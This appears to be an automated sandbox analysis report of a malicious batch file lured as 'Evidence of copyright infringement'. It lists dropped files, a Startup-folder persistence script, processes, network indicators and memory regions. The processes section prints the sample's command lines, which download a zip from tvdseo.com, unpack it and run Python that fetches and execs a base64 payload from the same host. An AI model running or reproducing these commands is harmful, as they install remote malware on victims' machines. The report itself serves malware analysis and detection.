Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Evidence of copyright infringement.bat
|
Unicode text, UTF-16, little-endian text, with very long lines (32767), with no line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecurity.bat
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage user DataBase, version 0x620, checksum 0x38b6adf5, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
PGP symmetric key encrypted data - salted & iterated -
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_juicadri.j2b.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lmc4ffnc.vjp.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v3mzs5mt.caz.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wrbupxkt.zfs.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
||
|
\Device\ConDrv
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
\Device\Null
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 3 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Evidence of copyright infringement.bat" "
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;
(New-Object -TypeName System.Net.WebClient).DownloadFile('https://tvdseo.com/file/synaptics.zip', 'C:\Users\Public\oZHyMUy4qk.zip')
"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /S /D /c" echo Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/oZHyMUy4qk.zip',
'C:/Users/Public/oZHyMUy4qk') "
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd.exe /c start "" /min C:\Users\Public\oZHyMUy4qk\synaptics.exe -c "import urllib.request;import base64;exec(base64.b64decode(urllib.request.urlopen('https://tvdseo.com/file/STC/STC_BOT').read().decode('utf-8')))"
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecurity.bat"
"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\chcp.com
|
chcp 65001
|
||
|
C:\Windows\System32\taskkill.exe
|
taskkill /F /IM synaptics.exe
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 2 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://g.live.com/odclientsettings/ProdV21C:
|
unknown
|
||
|
http://crl.ver)
|
unknown
|
||
|
https://g.live.com/odclientsettings/Prod1C:
|
unknown
|
||
|
https://tvdseo.com/file/synaptics.zip
|
172.67.189.157
|
||
|
https://tvdseo.com/file/STC/STC_BOT
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
bg.microsoft.map.fastly.net
|
199.232.214.172
|
||
|
tvdseo.com
|
172.67.189.157
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
172.67.189.157
|
tvdseo.com
|
United States
|
||
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
|
@%SystemRoot%\System32\ndfapi.dll,-40001
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
There are 6 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
19C7BAD0000
|
trusted library allocation
|
page read and write
|
||
|
19C7D000000
|
heap
|
page read and write
|
||
|
1BC56D44000
|
heap
|
page read and write
|
||
|
1BC56AB0000
|
heap
|
page read and write
|
||
|
8933FFF000
|
stack
|
page read and write
|
||
|
19C7BB70000
|
trusted library allocation
|
page read and write
|
||
|
19C764E0000
|
heap
|
page read and write
|
||
|
1BC56D40000
|
heap
|
page read and write
|
||
|
19C7BE40000
|
remote allocation
|
page read and write
|
||
|
1BC56ADA000
|
heap
|
page read and write
|
||
|
19C7BCEE000
|
heap
|
page read and write
|
||
|
19C7BD13000
|
heap
|
page read and write
|
||
|
19C7BBE0000
|
trusted library allocation
|
page read and write
|
||
|
525567E000
|
stack
|
page read and write
|
||
|
19C77580000
|
trusted library allocation
|
page read and write
|
||
|
19C76DE1000
|
trusted library allocation
|
page read and write
|
||
|
19C7665B000
|
heap
|
page read and write
|
||
|
1BC56CA0000
|
heap
|
page read and write
|
||
|
19C7BBF0000
|
trusted library allocation
|
page read and write
|
||
|
19C7662B000
|
heap
|
page read and write
|
||
|
19C76E00000
|
heap
|
page read and write
|
||
|
19C76D60000
|
trusted library section
|
page read and write
|
||
|
19C76613000
|
heap
|
page read and write
|
||
|
19C7667B000
|
heap
|
page read and write
|
||
|
19C7BE40000
|
remote allocation
|
page read and write
|
||
|
19C7668C000
|
heap
|
page read and write
|
||
|
19C7BCF4000
|
heap
|
page read and write
|
||
|
19C7BC40000
|
heap
|
page read and write
|
||
|
19C7BC54000
|
heap
|
page read and write
|
||
|
19C7BAD0000
|
trusted library allocation
|
page read and write
|
||
|
19C7BAFE000
|
trusted library allocation
|
page read and write
|
||
|
19C7BAE0000
|
trusted library allocation
|
page read and write
|
||
|
19C765F0000
|
trusted library allocation
|
page read and write
|
||
|
52555FE000
|
unkown
|
page readonly
|
||
|
52553FE000
|
unkown
|
page readonly
|
||
|
19C7BC61000
|
heap
|
page read and write
|
||
|
19C76E02000
|
heap
|
page read and write
|
||
|
19C7BC4D000
|
heap
|
page read and write
|
||
|
5255BFE000
|
unkown
|
page readonly
|
||
|
19C7BC00000
|
heap
|
page read and write
|
||
|
1BC56AA0000
|
heap
|
page read and write
|
||
|
19C76640000
|
heap
|
page read and write
|
||
|
19C77660000
|
trusted library section
|
page readonly
|
||
|
52560FE000
|
unkown
|
page readonly
|
||
|
19C7BCBC000
|
heap
|
page read and write
|
||
|
8933F7F000
|
stack
|
page read and write
|
||
|
19C76676000
|
heap
|
page read and write
|
||
|
525607E000
|
unkown
|
page readonly
|
||
|
5254CFE000
|
unkown
|
page readonly
|
||
|
19C7BD00000
|
heap
|
page read and write
|
||
|
52557FE000
|
unkown
|
page readonly
|
||
|
19C7BE40000
|
remote allocation
|
page read and write
|
||
|
19C76F02000
|
heap
|
page read and write
|
||
|
19C766B2000
|
heap
|
page read and write
|
||
|
5254BF7000
|
stack
|
page read and write
|
||
|
5256A7E000
|
stack
|
page read and write
|
||
|
19C7669E000
|
heap
|
page read and write
|
||
|
19C764C0000
|
heap
|
page read and write
|
||
|
52550F9000
|
stack
|
page read and write
|
||
|
19C776A0000
|
trusted library section
|
page readonly
|
||
|
8933EFC000
|
stack
|
page read and write
|
||
|
5255DFE000
|
unkown
|
page readonly
|
||
|
19C7BB70000
|
trusted library allocation
|
page read and write
|
||
|
19C7BD02000
|
heap
|
page read and write
|
||
|
19C7BC00000
|
trusted library allocation
|
page read and write
|
||
|
52554FB000
|
stack
|
page read and write
|
||
|
19C76702000
|
heap
|
page read and write
|
||
|
19C7BC2D000
|
heap
|
page read and write
|
||
|
5255D7E000
|
stack
|
page read and write
|
||
|
19C7BAA0000
|
trusted library allocation
|
page read and write
|
||
|
52563FB000
|
stack
|
page read and write
|
||
|
52552FC000
|
stack
|
page read and write
|
||
|
19C766A0000
|
heap
|
page read and write
|
||
|
5255CFE000
|
unkown
|
page readonly
|
||
|
19C7BA10000
|
trusted library allocation
|
page read and write
|
||
|
52556FE000
|
unkown
|
page readonly
|
||
|
19C76671000
|
heap
|
page read and write
|
||
|
525577E000
|
stack
|
page read and write
|
||
|
52562FE000
|
unkown
|
page readonly
|
||
|
52561FE000
|
stack
|
page read and write
|
||
|
19C76E15000
|
heap
|
page read and write
|
||
|
5255F7E000
|
stack
|
page read and write
|
||
|
19C7BAC0000
|
trusted library allocation
|
page read and write
|
||
|
19C7BA20000
|
trusted library allocation
|
page read and write
|
||
|
19C7BCBA000
|
heap
|
page read and write
|
||
|
19C7BAA0000
|
trusted library allocation
|
page read and write
|
||
|
19C76693000
|
heap
|
page read and write
|
||
|
19C7BD0C000
|
heap
|
page read and write
|
||
|
5255AFE000
|
unkown
|
page readonly
|
||
|
19C7BA80000
|
trusted library allocation
|
page read and write
|
||
|
19C77340000
|
trusted library allocation
|
page read and write
|
||
|
19C766FE000
|
heap
|
page read and write
|
||
|
19C77680000
|
trusted library section
|
page readonly
|
||
|
19C7BAE4000
|
trusted library allocation
|
page read and write
|
||
|
1BC56AD0000
|
heap
|
page read and write
|
||
|
5255EFE000
|
stack
|
page read and write
|
||
|
19C7BBD0000
|
trusted library allocation
|
page read and write
|
||
|
19C7BBF0000
|
trusted library allocation
|
page read and write
|
||
|
19C77690000
|
trusted library section
|
page readonly
|
||
|
19C7BC20000
|
heap
|
page read and write
|
||
|
5255C7E000
|
stack
|
page read and write
|
||
|
52559FB000
|
stack
|
page read and write
|
||
|
19C7BB80000
|
trusted library allocation
|
page read and write
|
||
|
525487B000
|
stack
|
page read and write
|
||
|
19C76713000
|
heap
|
page read and write
|
||
|
19C7BA90000
|
trusted library allocation
|
page read and write
|
||
|
19C776B0000
|
trusted library section
|
page readonly
|
||
|
19C7BCE6000
|
heap
|
page read and write
|
||
|
19C7BC8D000
|
heap
|
page read and write
|
||
|
19C766AD000
|
heap
|
page read and write
|
||
|
52558FE000
|
unkown
|
page readonly
|
||
|
19C77091000
|
trusted library allocation
|
page read and write
|
||
|
19C7BCE9000
|
heap
|
page read and write
|
||
|
19C76F1A000
|
heap
|
page read and write
|
||
|
52551FE000
|
unkown
|
page readonly
|
||
|
19C76F00000
|
heap
|
page read and write
|
||
|
19C76F1A000
|
heap
|
page read and write
|
||
|
19C7668E000
|
heap
|
page read and write
|
||
|
52564FE000
|
unkown
|
page readonly
|
||
|
19C76729000
|
heap
|
page read and write
|
||
|
19C77670000
|
trusted library section
|
page readonly
|
||
|
1BC56AD7000
|
heap
|
page read and write
|
||
|
5254EFE000
|
stack
|
page read and write
|
||
|
5254FFE000
|
unkown
|
page readonly
|
||
|
5255B7E000
|
stack
|
page read and write
|
||
|
19C76F13000
|
heap
|
page read and write
|
||
|
19C77A10000
|
trusted library allocation
|
page read and write
|
||
|
525587E000
|
stack
|
page read and write
|
||
|
19C7BCC1000
|
heap
|
page read and write
|
||
|
19C7BAA1000
|
trusted library allocation
|
page read and write
|
||
|
19C7BCDE000
|
heap
|
page read and write
|
||
|
19C765C0000
|
heap
|
page read and write
|
||
|
19C76600000
|
heap
|
page read and write
|
||
|
5256AFE000
|
unkown
|
page readonly
|
||
|
19C766BC000
|
heap
|
page read and write
|
There are 125 hidden memdumps, click here to show them.